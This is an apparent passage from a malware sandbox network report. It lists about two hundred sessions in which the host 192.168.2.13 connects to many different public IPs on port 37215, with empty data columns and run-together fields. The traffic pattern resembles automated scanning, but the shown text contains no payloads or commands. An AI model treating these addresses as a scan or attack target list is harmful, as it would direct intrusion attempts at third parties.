                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19760192.168.2.134649041.245.149.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19761192.168.2.135480641.202.58.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19762192.168.2.1341116197.111.45.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19763192.168.2.1346370158.118.47.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19764192.168.2.133585641.241.86.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19765192.168.2.1354590157.131.109.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19766192.168.2.1354162109.152.174.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19767192.168.2.1345596216.227.58.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19768192.168.2.1343878157.120.102.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19769192.168.2.1344244157.243.163.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19770192.168.2.134646041.8.255.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19771192.168.2.1356686197.222.164.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19772192.168.2.1342608157.197.67.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19773192.168.2.1353118157.130.136.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19774192.168.2.1348162208.222.246.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19775192.168.2.1350350128.222.54.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19776192.168.2.1332896197.10.114.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19777192.168.2.134589241.244.245.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19778192.168.2.1344958197.145.213.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19779192.168.2.1347414157.15.72.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19780192.168.2.1357720157.219.179.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19781192.168.2.1358304157.108.23.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19782192.168.2.1359278197.159.172.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19783192.168.2.1354720197.113.202.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19784192.168.2.1358062157.239.135.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19785192.168.2.134689632.42.214.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19786192.168.2.1345004157.27.184.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19787192.168.2.1342078197.161.69.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19788192.168.2.133382441.215.122.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19789192.168.2.1357306206.189.201.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19790192.168.2.1340066197.135.22.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19791192.168.2.1341816111.37.16.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19792192.168.2.1336038157.231.117.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19793192.168.2.1355496125.129.98.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19794192.168.2.1342342190.66.78.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19795192.168.2.1353884164.159.222.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19796192.168.2.1333600197.43.206.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19797192.168.2.1333522157.9.182.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19798192.168.2.1360892157.147.74.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19799192.168.2.1355368197.10.157.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19800192.168.2.135102841.215.99.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19801192.168.2.1353592157.64.197.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19802192.168.2.135585241.197.217.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19803192.168.2.133673886.86.229.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19804192.168.2.1348342135.181.154.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19805192.168.2.135060841.232.150.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19806192.168.2.13493282.160.42.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19807192.168.2.1350186197.172.90.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19808192.168.2.133366641.216.95.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19809192.168.2.1341630197.43.62.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19810192.168.2.1344974197.75.201.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19811192.168.2.1357096157.184.107.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19812192.168.2.1336942197.178.155.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19813192.168.2.135643641.180.38.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19814192.168.2.135136081.154.130.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19815192.168.2.135888041.12.66.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19816192.168.2.1350598157.91.181.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19817192.168.2.1343508197.34.22.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19818192.168.2.136096274.26.139.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19819192.168.2.1338672157.43.71.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19820192.168.2.135259090.215.108.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19821192.168.2.1349144157.167.98.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19822192.168.2.136023041.95.171.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19823192.168.2.1342272174.241.70.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19824192.168.2.134586441.34.247.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19825192.168.2.1358952116.245.100.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19826192.168.2.1336312157.3.69.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19827192.168.2.1359362197.154.60.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19828192.168.2.1341902197.208.175.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19829192.168.2.135719835.63.1.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19830192.168.2.1332906211.100.75.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19831192.168.2.1333512197.226.102.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19832192.168.2.135258241.143.20.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19833192.168.2.1348084197.21.55.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19834192.168.2.134416241.42.83.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19835192.168.2.135204041.63.125.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19836192.168.2.1359264197.236.32.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19837192.168.2.1353054157.124.1.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19838192.168.2.1344460197.205.25.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19839192.168.2.1351922218.29.222.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19840192.168.2.134701241.239.163.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19841192.168.2.1351666157.254.43.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19842192.168.2.1351214157.3.187.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19843192.168.2.1359416157.73.92.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19844192.168.2.1344346157.117.102.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19845192.168.2.1336934157.209.197.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19846192.168.2.1339010198.201.166.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19847192.168.2.1353420197.190.137.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19848192.168.2.133604075.210.23.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19849192.168.2.1341030157.135.212.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19850192.168.2.1334238157.216.180.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19851192.168.2.135284441.155.53.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19852192.168.2.1345734157.138.8.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19853192.168.2.1357286197.4.22.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19854192.168.2.1334798197.32.178.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19855192.168.2.1346832157.175.221.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19856192.168.2.1358372197.194.119.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19857192.168.2.1356900197.109.65.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19858192.168.2.1355252197.56.203.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19859192.168.2.1350454157.241.2.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19860192.168.2.133961841.156.112.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19861192.168.2.1350988180.238.33.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19862192.168.2.136071423.184.136.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19863192.168.2.133466841.44.62.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19864192.168.2.1354124157.115.195.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19865192.168.2.1341328197.19.130.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19866192.168.2.1333344157.194.244.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19867192.168.2.1342590197.75.184.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19868192.168.2.1351484157.131.12.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19869192.168.2.134710641.250.17.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19870192.168.2.1337286197.72.57.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19871192.168.2.134656841.224.252.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19872192.168.2.133684041.189.222.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19873192.168.2.135543041.253.109.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19874192.168.2.1347354157.27.99.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19875192.168.2.134464241.19.189.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19876192.168.2.1356752157.238.19.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19877192.168.2.1342028197.252.205.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19878192.168.2.1357264157.184.20.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19879192.168.2.135375041.108.236.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19880192.168.2.134818841.36.122.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19881192.168.2.1338632139.70.100.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19882192.168.2.133993441.5.227.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19883192.168.2.133501281.150.230.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19884192.168.2.1348926197.55.187.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19885192.168.2.1340194135.98.187.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19886192.168.2.1358582157.10.98.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19887192.168.2.135296441.240.247.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19888192.168.2.1352950152.55.168.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19889192.168.2.1339206197.27.112.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19890192.168.2.1347374197.211.184.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19891192.168.2.136052676.195.100.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19892192.168.2.1334076157.150.127.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19893192.168.2.1346594157.203.128.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19894192.168.2.1356280197.246.170.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19895192.168.2.1345410149.236.95.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19896192.168.2.135322641.125.223.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19897192.168.2.1358840157.114.122.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19898192.168.2.134652441.45.175.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19899192.168.2.1334682223.235.103.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19900192.168.2.1359896157.165.198.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19901192.168.2.1346694197.20.208.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19902192.168.2.135584058.112.223.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19903192.168.2.134876441.36.223.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19904192.168.2.135355652.15.39.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19905192.168.2.135805641.90.61.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19906192.168.2.1342148197.71.248.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19907192.168.2.135762241.161.251.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19908192.168.2.135475861.167.88.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19909192.168.2.1344782197.51.52.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19910192.168.2.1358814197.100.152.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19911192.168.2.1347388157.93.98.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19912192.168.2.135993636.147.153.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19913192.168.2.134099241.214.208.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19914192.168.2.135424841.28.159.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19915192.168.2.1355584197.186.241.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19916192.168.2.1343910157.227.74.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19917192.168.2.135818241.70.196.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19918192.168.2.1358682197.23.133.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19919192.168.2.1340502157.138.32.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19920192.168.2.1351992157.75.200.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19921192.168.2.1357280221.36.212.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19922192.168.2.1346382126.23.134.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19923192.168.2.1338316188.165.150.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19924192.168.2.134481070.26.165.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19925192.168.2.1352194157.46.139.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19926192.168.2.133618474.123.46.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19927192.168.2.1345086157.129.229.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19928192.168.2.1359610157.67.14.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19929192.168.2.1341078161.63.38.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19930192.168.2.1347100197.78.173.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19931192.168.2.1351632203.109.248.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19932192.168.2.1359432171.13.216.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19933192.168.2.1337916157.252.162.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19934192.168.2.1359978221.90.131.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19935192.168.2.13412468.43.68.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19936192.168.2.135479841.47.88.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19937192.168.2.1335364197.24.35.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19938192.168.2.135971841.119.158.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19939192.168.2.1339908178.6.229.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19940192.168.2.1358978157.13.109.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19941192.168.2.1353012157.46.110.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19942192.168.2.1338208197.177.2.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19943192.168.2.1357150197.21.251.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19944192.168.2.1339494197.124.155.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19945192.168.2.1350500197.70.177.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19946192.168.2.1344032197.168.0.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19947192.168.2.1356398148.178.131.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19948192.168.2.1351436160.174.224.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19949192.168.2.1340132181.110.233.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19950192.168.2.1336940157.142.223.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19951192.168.2.134442274.149.94.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19952192.168.2.134109041.205.118.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19953192.168.2.1342796197.126.127.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19954192.168.2.1342606106.242.5.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19955192.168.2.1350904197.200.114.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19956192.168.2.1341508197.105.62.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19957192.168.2.134813041.56.219.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19958192.168.2.1343750122.51.6.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19959192.168.2.134107841.216.216.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19960192.168.2.1350802197.99.17.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19961192.168.2.133298441.243.37.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19962192.168.2.1334254157.172.104.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19963192.168.2.1338228197.182.103.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19964192.168.2.1349328157.222.36.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19965192.168.2.1345158157.179.69.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19966192.168.2.1359940197.44.220.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19967192.168.2.1337654157.240.125.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19968192.168.2.1344824148.235.205.6437215
                                                  TimestampBytes transferredDirectionData


